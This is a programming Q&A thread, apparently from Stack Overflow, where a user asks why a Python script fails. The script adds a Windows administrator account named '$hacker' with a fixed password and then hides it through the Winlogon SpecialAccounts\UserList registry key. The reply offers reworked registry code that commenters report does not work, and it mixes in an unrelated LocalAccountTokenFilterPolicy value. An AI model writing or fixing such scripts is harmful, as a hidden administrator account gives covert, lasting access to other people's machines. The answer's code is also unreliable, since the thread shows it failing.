# Creating a new DWORD with Python

Tags: python, dword, winreg

Hello guys I am trying to teach myself more python than my college does and im trying to create python file to the bash file ive created once.
The bash file is supposed to open a new user on 'net users' named $hacker and afterwards hide it on Registory.
The try is working good and im getting all of the prints i asked when everything is complete but for some reason the DWORD wasnt created (two keys as well)
Hope someone will know what am I doing wrong !

```
import os 
import sys 
import winreg as w

os.system("net users $hacker Aa123456 /add")
os.system("net groups Administrators $hacker /add")

try:
    key = w.CreateKey(w.HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\SpecialAccounts\\UserList")
    print("/SpecialAccount/UserList Was succesfully created !")
    w.SetValueEx(key,'$hacker',0,w.REG_DWORD, 0)
    print("DWORD was succesfully created !")
except:
    print("Sorry there was a problem finishing the changes.")
    print("Please try again.")
    quit()
```

Answer (score 0):

Try below

```
import winreg as wreg

try:
    key = wreg.CreateKey(wreg.HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\SpecialAccounts\\UserList")
    wreg.SetValue(key, 'NewSubkey', wreg.REG_SZ, 'LocalAccountTokenFilterPolicy')
    wreg.SetValueEx(key, 'ValueName', 0, wreg.REG_DWORD, '0x00000001')
    key.Close()
    print("DWORD was succesfully created !")
except:
    print("Sorry there was a problem finishing the changes.")
    print("Please try again.")
    quit()
```

Comment: I just edited the post so it will hold the full script.

Comment: And just changing 0 to '0x00000001' cuase the except to work.
this aint working as well =[

Comment: HI @danielravehits only only the 0 to 0x00000001 change, well it depends on the windows version you are using, in windows 10 the path your are trying is not available (SpecialAccounts) path doesn't exists in windows 10, i haven't tried this on windows 7, you have to check the path if that really exists.

Comment: it doesnt by default thats why im creating it first and only then trying to create a value inside it